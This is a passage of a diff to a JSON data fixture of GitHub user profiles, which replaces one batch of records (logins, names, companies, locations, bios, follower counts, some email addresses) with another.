"is_hireable": false, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2018-08-08T13:46:50Z", + "updated_at": "2024-09-03T18:43:32Z", + "node_id": "MDQ6VXNlcjQyMjExMzAz", + "bio": "Customer support & documentation. Compulsive tinkerer.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2371, + "pk": 7710, "fields": { - "nest_created_at": "2024-09-12T01:20:46.111Z", - "nest_updated_at": "2024-09-12T01:20:46.111Z", + "nest_created_at": "2024-09-22T09:36:05.949Z", + "nest_updated_at": "2024-09-22T19:37:44.395Z", "name": "", - "login": "dandersonaspect", + "login": "bgoareguer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10606605?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43874676?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-01-20T01:35:05Z", - "updated_at": "2021-10-21T18:14:53Z", - "node_id": "MDQ6VXNlcjEwNjA2NjA1", + "public_repositories_count": 9, + "created_at": "2018-10-05T07:30:46Z", + "updated_at": "2024-09-13T06:31:02Z", + "node_id": "MDQ6VXNlcjQzODc0Njc2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419528,74 +678677,74 @@ }, { "model": "github.user", - "pk": 2372, + "pk": 7711, "fields": { - "nest_created_at": "2024-09-12T01:20:48.303Z", - "nest_updated_at": "2024-09-12T01:20:48.303Z", - "name": "Sascha Knoop", - "login": "darkspirit510", + "nest_created_at": "2024-09-22T09:36:06.285Z", + "nest_updated_at": "2024-09-22T19:38:17.024Z", + "name": "", + "login": "rasinfosec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17259447?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/30250994?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2016-02-15T21:12:06Z", - "updated_at": "2024-07-29T09:36:03Z", - "node_id": "MDQ6VXNlcjE3MjU5NDQ3", - "bio": "", + "public_repositories_count": 19, + "created_at": "2017-07-18T03:18:11Z", + "updated_at": "2024-03-03T17:51:21Z", + "node_id": "MDQ6VXNlcjMwMjUwOTk0", + "bio": "Roy Shoemake", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2373, + "pk": 7712, "fields": { - "nest_created_at": "2024-09-12T01:20:49.915Z", - "nest_updated_at": "2024-09-12T01:20:49.915Z", - "name": "", - "login": "njarbot", + "nest_created_at": "2024-09-22T09:36:06.607Z", + "nest_updated_at": "2024-09-22T19:37:29.838Z", + "name": "Romain Aviolat", + "login": "xens", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73914352?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1699826?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 21, + "followers_count": 46, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-11-03T22:10:13Z", - "updated_at": "2024-08-27T12:29:05Z", - "node_id": "MDQ6VXNlcjczOTE0MzUy", + "public_repositories_count": 66, + "created_at": "2012-05-02T18:02:12Z", + "updated_at": "2024-09-21T11:24:13Z", + "node_id": "MDQ6VXNlcjE2OTk4MjY=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2374, + "pk": 7713, "fields": { - "nest_created_at": "2024-09-12T01:20:50.727Z", - "nest_updated_at": "2024-09-18T19:06:33.714Z", - "name": "Philippe ", - "login": "Qwarctick", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31954718?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:36:07.249Z", + "nest_updated_at": "2024-09-22T19:35:09.935Z", + "name": "Yaakov Saxon", + "login": "YSaxon", + "email": "ysaxon@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11711101?v=4", + "company": "North American Bancard", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2017-09-14T09:29:18Z", - "updated_at": "2024-09-14T20:36:34Z", - "node_id": "MDQ6VXNlcjMxOTU0NzE4", + "following_count": 1, + "followers_count": 6, + "public_gists_count": 27, + "public_repositories_count": 84, + "created_at": "2015-03-29T23:07:25Z", + "updated_at": "2024-08-22T20:53:11Z", + "node_id": "MDQ6VXNlcjExNzExMTAx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419603,124 +678752,124 @@ }, { "model": "github.user", - "pk": 2375, + "pk": 7714, "fields": { - "nest_created_at": "2024-09-12T01:20:58.441Z", - "nest_updated_at": "2024-09-18T19:08:04.800Z", - "name": "Dependency-Track", - "login": "DependencyTrack", + "nest_created_at": "2024-09-22T09:36:07.559Z", + "nest_updated_at": "2024-09-22T19:37:33.467Z", + "name": "Mohammed A Imran", + "login": "secfigo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40258585?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11695998?v=4", + "company": "Practical DevSecOps", + "location": "Singapore", "collaborators_count": 0, - "following_count": 0, - "followers_count": 265, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2018-06-14T06:02:36Z", - "updated_at": "2024-09-01T11:32:48Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjQwMjU4NTg1", - "bio": "Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain", + "following_count": 6, + "followers_count": 312, + "public_gists_count": 16, + "public_repositories_count": 85, + "created_at": "2015-03-28T15:26:15Z", + "updated_at": "2024-07-12T07:28:36Z", + "node_id": "MDQ6VXNlcjExNjk1OTk4", + "bio": "Senior Security Engineer, loves all things security. \r\n\r\nReachable on all social media accounts via @secfigo handle\r\n\r\nhttps://www.linkedin.com/in/secfigo ", "is_hireable": false, - "twitter_username": "DependencyTrack" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2376, + "pk": 7715, "fields": { - "nest_created_at": "2024-09-12T01:21:05.956Z", - "nest_updated_at": "2024-09-14T19:17:42.741Z", - "name": "", - "login": "sonatype-depshield[bot]", + "nest_created_at": "2024-09-22T09:36:07.873Z", + "nest_updated_at": "2024-09-22T19:35:10.565Z", + "name": "Anthony", + "login": "Apipia", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/in/13833?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/17787069?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-06-20T22:30:15Z", - "updated_at": "2018-07-23T20:22:50Z", - "node_id": "MDM6Qm90NDA0NDM2MjM=", - "bio": "", + "public_repositories_count": 13, + "created_at": "2016-03-11T17:03:06Z", + "updated_at": "2023-10-20T18:11:30Z", + "node_id": "MDQ6VXNlcjE3Nzg3MDY5", + "bio": "Cybersecurity Engineer and Pentester. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2377, + "pk": 7716, "fields": { - "nest_created_at": "2024-09-12T01:21:10.953Z", - "nest_updated_at": "2024-09-18T19:06:49.565Z", - "name": "Ed Snible", - "login": "esnible", - "email": "esnible@acm.org", - "avatar_url": "https://avatars.githubusercontent.com/u/3237651?v=4", - "company": "@IBM @ibm-research and Red Hat partner engineer", - "location": "Bronx, NY", + "nest_created_at": "2024-09-22T09:36:08.181Z", + "nest_updated_at": "2024-09-22T19:38:15.764Z", + "name": "Matt Sicker", + "login": "jvz", + "email": "mattsicker@apache.org", + "avatar_url": "https://avatars.githubusercontent.com/u/791275?v=4", + "company": "@apple", + "location": "Chicago", "collaborators_count": 0, - "following_count": 12, - "followers_count": 28, - "public_gists_count": 0, - "public_repositories_count": 38, - "created_at": "2013-01-10T18:35:14Z", - "updated_at": "2024-09-05T17:11:41Z", - "node_id": "MDQ6VXNlcjMyMzc2NTE=", - "bio": "Software engineer at IBM TJ Watson Research Center.", + "following_count": 33, + "followers_count": 124, + "public_gists_count": 28, + "public_repositories_count": 138, + "created_at": "2011-05-16T15:38:08Z", + "updated_at": "2024-09-04T17:11:33Z", + "node_id": "MDQ6VXNlcjc5MTI3NQ==", + "bio": "Computer scientist, distributed systems software engineer, and advocate for free and open source software. Developer in Log4j and Spinnaker. (he/him/his)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2378, + "pk": 7717, "fields": { - "nest_created_at": "2024-09-12T01:21:25.780Z", - "nest_updated_at": "2024-09-12T01:21:25.780Z", - "name": "Konstantin Shemyak", - "login": "KonstantinShemyak", + "nest_created_at": "2024-09-22T09:36:09.474Z", + "nest_updated_at": "2024-09-22T19:35:12.245Z", + "name": "Andrey Sidorov", + "login": "ansidorov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3096603?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/68654745?v=4", "company": "", - "location": "Finland", + "location": "", "collaborators_count": 0, "following_count": 1, "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2012-12-21T08:24:51Z", - "updated_at": "2024-08-11T14:25:50Z", - "node_id": "MDQ6VXNlcjMwOTY2MDM=", - "bio": "", + "public_repositories_count": 5, + "created_at": "2020-07-22T15:30:14Z", + "updated_at": "2023-06-30T08:28:07Z", + "node_id": "MDQ6VXNlcjY4NjU0NzQ1", + "bio": "DevOps", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2379, + "pk": 7718, "fields": { - "nest_created_at": "2024-09-12T01:21:28.759Z", - "nest_updated_at": "2024-09-12T01:21:32.108Z", - "name": "", - "login": "StephenTrombetti", + "nest_created_at": "2024-09-22T09:36:10.121Z", + "nest_updated_at": "2024-09-22T19:35:12.881Z", + "name": "Vijay Bheemineni", + "login": "bharghav9", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3828025?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3298471?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-03-11T03:29:56Z", - "updated_at": "2024-05-30T17:32:38Z", - "node_id": "MDQ6VXNlcjM4MjgwMjU=", + "public_repositories_count": 1, + "created_at": "2013-01-17T17:44:12Z", + "updated_at": "2016-05-25T18:11:53Z", + "node_id": "MDQ6VXNlcjMyOTg0NzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419728,49 +678877,49 @@ }, { "model": "github.user", - "pk": 2380, + "pk": 7719, "fields": { - "nest_created_at": "2024-09-12T01:21:37.976Z", - "nest_updated_at": "2024-09-12T01:21:39.221Z", - "name": "", - "login": "stboissdev", + "nest_created_at": "2024-09-22T09:36:11.432Z", + "nest_updated_at": "2024-09-22T19:38:15.450Z", + "name": "Steeve Barbeau", + "login": "steeve85", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24654609?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/140790?v=4", "company": "", - "location": "", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2016-12-19T15:03:13Z", - "updated_at": "2024-09-04T12:47:46Z", - "node_id": "MDQ6VXNlcjI0NjU0NjA5", + "following_count": 31, + "followers_count": 68, + "public_gists_count": 24, + "public_repositories_count": 11, + "created_at": "2009-10-16T19:16:13Z", + "updated_at": "2024-09-22T11:24:33Z", + "node_id": "MDQ6VXNlcjE0MDc5MA==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2381, + "pk": 7720, "fields": { - "nest_created_at": "2024-09-12T01:21:40.908Z", - "nest_updated_at": "2024-09-12T01:21:40.908Z", - "name": "", - "login": "Arunraj89", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16404627?v=4", + "nest_created_at": "2024-09-22T09:36:12.380Z", + "nest_updated_at": "2024-09-22T19:35:15.122Z", + "name": "Caleb Coffie", + "login": "CCoffie", + "email": "CalebCoffie@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1766527?v=4", "company": "", - "location": "", + "location": "USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-12-22T18:02:54Z", - "updated_at": "2021-02-18T11:14:53Z", - "node_id": "MDQ6VXNlcjE2NDA0NjI3", + "following_count": 17, + "followers_count": 21, + "public_gists_count": 3, + "public_repositories_count": 37, + "created_at": "2012-05-22T18:35:54Z", + "updated_at": "2024-09-04T17:46:32Z", + "node_id": "MDQ6VXNlcjE3NjY1Mjc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419778,49 +678927,49 @@ }, { "model": "github.user", - "pk": 2382, + "pk": 7721, "fields": { - "nest_created_at": "2024-09-12T01:22:00.292Z", - "nest_updated_at": "2024-09-12T01:22:55.710Z", - "name": "Drew", - "login": "Drewster727", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4528753?v=4", + "nest_created_at": "2024-09-22T09:36:13.960Z", + "nest_updated_at": "2024-09-22T19:35:16.731Z", + "name": "Izzie Walton", + "login": "iwalton3", + "email": "izzie@iwalton.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8078788?v=4", "company": "", - "location": "Kansas City", + "location": "United States", "collaborators_count": 0, - "following_count": 9, - "followers_count": 22, - "public_gists_count": 4, - "public_repositories_count": 46, - "created_at": "2013-05-25T19:15:23Z", - "updated_at": "2024-09-11T20:58:13Z", - "node_id": "MDQ6VXNlcjQ1Mjg3NTM=", - "bio": "", + "following_count": 0, + "followers_count": 78, + "public_gists_count": 26, + "public_repositories_count": 32, + "created_at": "2014-07-06T04:07:29Z", + "updated_at": "2024-05-31T00:28:13Z", + "node_id": "MDQ6VXNlcjgwNzg3ODg=", + "bio": "I work on Jellyfin and other side projects, mostly media related.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2383, + "pk": 7722, "fields": { - "nest_created_at": "2024-09-12T01:22:03.693Z", - "nest_updated_at": "2024-09-12T01:23:28.412Z", - "name": "", - "login": "joergsesterhenn", + "nest_created_at": "2024-09-22T09:36:14.978Z", + "nest_updated_at": "2024-09-22T19:35:17.669Z", + "name": "Eric Kelson", + "login": "eik18", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/974666?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6960810?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2011-08-11T19:42:16Z", - "updated_at": "2024-08-01T09:21:44Z", - "node_id": "MDQ6VXNlcjk3NDY2Ng==", + "following_count": 1, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2014-03-15T16:16:00Z", + "updated_at": "2024-02-22T16:16:00Z", + "node_id": "MDQ6VXNlcjY5NjA4MTA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419828,74 +678977,74 @@ }, { "model": "github.user", - "pk": 2384, + "pk": 7723, "fields": { - "nest_created_at": "2024-09-12T01:22:13.763Z", - "nest_updated_at": "2024-09-16T22:28:25.947Z", - "name": "", - "login": "security101", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6241898?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:36:15.601Z", + "nest_updated_at": "2024-09-22T19:35:18.329Z", + "name": "Alejandro Tortolero", + "login": "ajtortolero", + "email": "ajtortolero@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7990803?v=4", + "company": "Bancolombia", + "location": "Medellin, Colombia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 5, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2013-12-22T15:46:01Z", - "updated_at": "2024-01-16T16:31:29Z", - "node_id": "MDQ6VXNlcjYyNDE4OTg=", + "public_repositories_count": 22, + "created_at": "2014-06-25T23:37:56Z", + "updated_at": "2024-09-06T11:29:57Z", + "node_id": "MDQ6VXNlcjc5OTA4MDM=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ajtortolero" } }, { "model": "github.user", - "pk": 2385, + "pk": 7724, "fields": { - "nest_created_at": "2024-09-12T01:22:17.104Z", - "nest_updated_at": "2024-09-12T01:22:17.104Z", - "name": "Melba", - "login": "melba-lopez", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101211710?v=4", - "company": "@IBM ", + "nest_created_at": "2024-09-22T09:36:15.932Z", + "nest_updated_at": "2024-09-22T19:35:18.651Z", + "name": "Frostweeds", + "login": "Frostweeds", + "email": "romain.jufer@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5502789?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, + "following_count": 1, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2022-03-08T18:45:02Z", - "updated_at": "2024-07-10T14:39:20Z", - "node_id": "U_kgDOBghePg", - "bio": "", + "public_repositories_count": 8, + "created_at": "2013-09-20T15:39:56Z", + "updated_at": "2024-09-05T13:12:31Z", + "node_id": "MDQ6VXNlcjU1MDI3ODk=", + "bio": "Working @avnu-labs ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2386, + "pk": 7725, "fields": { - "nest_created_at": "2024-09-12T01:22:23.879Z", - "nest_updated_at": "2024-09-12T01:22:23.879Z", - "name": "", - "login": "mbayrak78", + "nest_created_at": "2024-09-22T09:36:16.265Z", + "nest_updated_at": "2024-09-22T19:35:18.963Z", + "name": "Frédéric Marchand", + "login": "uncycler", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33459119?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1673467?v=4", "company": "", - "location": "", + "location": "Switzerland", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-11-07T15:31:56Z", - "updated_at": "2021-04-22T11:44:08Z", - "node_id": "MDQ6VXNlcjMzNDU5MTE5", + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 33, + "created_at": "2012-04-24T06:34:15Z", + "updated_at": "2024-08-22T00:27:49Z", + "node_id": "MDQ6VXNlcjE2NzM0Njc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419903,149 +679052,149 @@ }, { "model": "github.user", - "pk": 2387, + "pk": 7726, "fields": { - "nest_created_at": "2024-09-12T01:22:59.888Z", - "nest_updated_at": "2024-09-12T01:22:59.888Z", - "name": "Hannes Scholte", - "login": "HSSE-Dev", - "email": "hsse-development@outlook.com", - "avatar_url": "https://avatars.githubusercontent.com/u/23707828?v=4", - "company": "CIDEON Software & Services GmbH", - "location": "Görlitz, Germany", + "nest_created_at": "2024-09-22T09:36:16.591Z", + "nest_updated_at": "2024-09-22T19:35:19.275Z", + "name": "I", + "login": "bakalor", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18326194?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 4, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-11-23T20:35:50Z", - "updated_at": "2024-08-08T11:36:05Z", - "node_id": "MDQ6VXNlcjIzNzA3ODI4", - "bio": "I am a software developer at CIDEON Software & Services GmbH & Co. KG in Görlitz, Germany. \r\nI work on various projects and technologies.", + "public_repositories_count": 8, + "created_at": "2016-04-07T09:41:33Z", + "updated_at": "2023-09-21T09:27:35Z", + "node_id": "MDQ6VXNlcjE4MzI2MTk0", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2388, + "pk": 7727, "fields": { - "nest_created_at": "2024-09-12T01:23:01.742Z", - "nest_updated_at": "2024-09-12T01:23:01.742Z", - "name": "Chris Sansone", - "login": "chris-sansone-angi", + "nest_created_at": "2024-09-22T09:36:16.907Z", + "nest_updated_at": "2024-09-22T19:37:29.209Z", + "name": "Piotr PAWLICKI", + "login": "ppiotr3k", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51127567?v=4", - "company": "Angi", - "location": "New York", + "avatar_url": "https://avatars.githubusercontent.com/u/309628?v=4", + "company": "", + "location": "Earth > France > Paris", "collaborators_count": 0, - "following_count": 2, - "followers_count": 4, + "following_count": 0, + "followers_count": 11, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-05-28T15:09:43Z", - "updated_at": "2024-04-16T20:11:42Z", - "node_id": "MDQ6VXNlcjUxMTI3NTY3", - "bio": "Director of Security at Angi | Personal GitHub Account: @chrissansone", + "public_repositories_count": 11, + "created_at": "2010-06-19T21:00:38Z", + "updated_at": "2024-08-28T11:21:00Z", + "node_id": "MDQ6VXNlcjMwOTYyOA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2389, + "pk": 7728, "fields": { - "nest_created_at": "2024-09-12T01:23:11.495Z", - "nest_updated_at": "2024-09-12T01:23:11.495Z", - "name": "&γ", - "login": "theCamelCaser", + "nest_created_at": "2024-09-22T09:36:17.225Z", + "nest_updated_at": "2024-09-22T19:35:19.903Z", + "name": "Jose Roman", + "login": "JoseRoman", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22252950?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4240075?v=4", + "company": "@Chatham", "location": "", "collaborators_count": 0, - "following_count": 5, + "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-09-17T07:10:38Z", - "updated_at": "2024-06-17T06:37:47Z", - "node_id": "MDQ6VXNlcjIyMjUyOTUw", - "bio": "¯\\_(ツ)_/¯", + "public_gists_count": 1, + "public_repositories_count": 25, + "created_at": "2013-04-24T00:02:01Z", + "updated_at": "2024-09-22T03:28:47Z", + "node_id": "MDQ6VXNlcjQyNDAwNzU=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2390, + "pk": 7729, "fields": { - "nest_created_at": "2024-09-12T01:23:13.187Z", - "nest_updated_at": "2024-09-12T01:23:13.187Z", - "name": "Marc", - "login": "pachulo", + "nest_created_at": "2024-09-22T09:36:17.856Z", + "nest_updated_at": "2024-09-22T19:35:20.555Z", + "name": "Poonam Mishra", + "login": "mish24", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3256953?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24610197?v=4", + "company": "BITS Pilani", "location": "", "collaborators_count": 0, - "following_count": 21, - "followers_count": 24, + "following_count": 32, + "followers_count": 90, "public_gists_count": 0, - "public_repositories_count": 35, - "created_at": "2013-01-13T10:19:33Z", - "updated_at": "2024-09-03T22:24:58Z", - "node_id": "MDQ6VXNlcjMyNTY5NTM=", + "public_repositories_count": 32, + "created_at": "2016-12-16T16:05:54Z", + "updated_at": "2022-12-07T21:57:45Z", + "node_id": "MDQ6VXNlcjI0NjEwMTk3", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2391, + "pk": 7730, "fields": { - "nest_created_at": "2024-09-12T01:23:16.567Z", - "nest_updated_at": "2024-09-12T01:30:41.457Z", - "name": "Cédric Menzi", - "login": "cmenzi", - "email": "cedric.menzi@buhlergroup.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1763806?v=4", - "company": "Bühler AG", - "location": "Uzwil, Switzerland", + "nest_created_at": "2024-09-22T09:36:18.491Z", + "nest_updated_at": "2024-09-22T19:35:21.187Z", + "name": "Imran Mohammed", + "login": "imohammedzen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23624531?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 18, - "followers_count": 21, - "public_gists_count": 2, - "public_repositories_count": 36, - "created_at": "2012-05-22T09:37:18Z", - "updated_at": "2024-08-28T11:24:42Z", - "node_id": "MDQ6VXNlcjE3NjM4MDY=", - "bio": "", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2016-11-21T04:00:08Z", + "updated_at": "2018-09-03T06:46:26Z", + "node_id": "MDQ6VXNlcjIzNjI0NTMx", + "bio": "Security Engineer at Zendesk", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2392, + "pk": 7731, "fields": { - "nest_created_at": "2024-09-12T01:23:32.554Z", - "nest_updated_at": "2024-09-12T01:23:32.554Z", - "name": "Steve Abbagnaro", - "login": "SteveAbb", - "email": "steve@abbagnaro.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5322003?v=4", + "nest_created_at": "2024-09-22T09:36:19.133Z", + "nest_updated_at": "2024-09-22T19:35:21.819Z", + "name": "Gotsman Kirill", + "login": "blacklotos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2391490?v=4", "company": "", - "location": "CT", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2013-08-27T14:46:02Z", - "updated_at": "2024-08-12T14:16:19Z", - "node_id": "MDQ6VXNlcjUzMjIwMDM=", + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2012-09-21T06:52:13Z", + "updated_at": "2024-09-22T10:30:28Z", + "node_id": "MDQ6VXNlcjIzOTE0OTA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420053,49 +679202,49 @@ }, { "model": "github.user", - "pk": 2393, + "pk": 7732, "fields": { - "nest_created_at": "2024-09-12T01:23:37.994Z", - "nest_updated_at": "2024-09-12T01:23:37.994Z", - "name": "Grégory Romé", - "login": "gpr", - "email": "gregory.rome@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/309019?v=4", - "company": "PayFit", - "location": "Louveciennes", + "nest_created_at": "2024-09-22T09:36:19.452Z", + "nest_updated_at": "2024-09-22T19:35:22.144Z", + "name": "Arie Kurniawan", + "login": "arkrwn", + "email": "arkrwn@proton.me", + "avatar_url": "https://avatars.githubusercontent.com/u/17982949?v=4", + "company": "GoTo Financial", + "location": "Jakarta, Indonesia", "collaborators_count": 0, - "following_count": 1, - "followers_count": 7, - "public_gists_count": 27, - "public_repositories_count": 42, - "created_at": "2010-06-18T21:19:28Z", - "updated_at": "2024-08-28T16:10:26Z", - "node_id": "MDQ6VXNlcjMwOTAxOQ==", - "bio": "", - "is_hireable": false, + "following_count": 10, + "followers_count": 130, + "public_gists_count": 11, + "public_repositories_count": 39, + "created_at": "2016-03-21T12:22:26Z", + "updated_at": "2024-09-18T11:33:32Z", + "node_id": "MDQ6VXNlcjE3OTgyOTQ5", + "bio": "An enthusiast in the field of cybersecurity, currently focusing on DevSecOps and the development of software tools to support security needs.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2394, + "pk": 7733, "fields": { - "nest_created_at": "2024-09-12T01:23:40.498Z", - "nest_updated_at": "2024-09-12T01:42:03.468Z", - "name": "", - "login": "technoo10201", + "nest_created_at": "2024-09-22T09:36:20.098Z", + "nest_updated_at": "2024-09-22T19:35:22.781Z", + "name": "Robert", + "login": "rookies", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31561379?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1671878?v=4", + "company": "mgm security partners GmbH", + "location": "Dresden, Germany", "collaborators_count": 0, - "following_count": 7, - "followers_count": 3, + "following_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2017-09-02T07:08:56Z", - "updated_at": "2024-08-21T21:15:10Z", - "node_id": "MDQ6VXNlcjMxNTYxMzc5", + "public_repositories_count": 45, + "created_at": "2012-04-23T18:33:42Z", + "updated_at": "2024-09-12T20:03:45Z", + "node_id": "MDQ6VXNlcjE2NzE4Nzg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420103,24 +679252,24 @@ }, { "model": "github.user", - "pk": 2395, + "pk": 7734, "fields": { - "nest_created_at": "2024-09-12T01:23:42.182Z", - "nest_updated_at": "2024-09-12T01:23:42.182Z", + "nest_created_at": "2024-09-22T09:36:20.417Z", + "nest_updated_at": "2024-09-22T19:35:23.093Z", "name": "", - "login": "morganmccarley", + "login": "sc-tibco", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4392342?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/67396122?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2013-05-10T02:03:31Z", - "updated_at": "2022-06-22T16:11:39Z", - "node_id": "MDQ6VXNlcjQzOTIzNDI=", + "public_repositories_count": 1, + "created_at": "2020-06-24T22:33:37Z", + "updated_at": "2020-09-02T20:55:02Z", + "node_id": "MDQ6VXNlcjY3Mzk2MTIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -420128,24 +679277,24 @@ }, { "model": "github.user", - "pk": 2396, + "pk": 7735, "fields": { - "nest_created_at": "2024-09-12T01:23:43.471Z", - "nest_updated_at": "2024-09-18T00:18:11.794Z", - "name": "Petr H", - "login": "hostalp", + "nest_created_at": "2024-09-22T09:36:20.725Z", + "nest_updated_at": 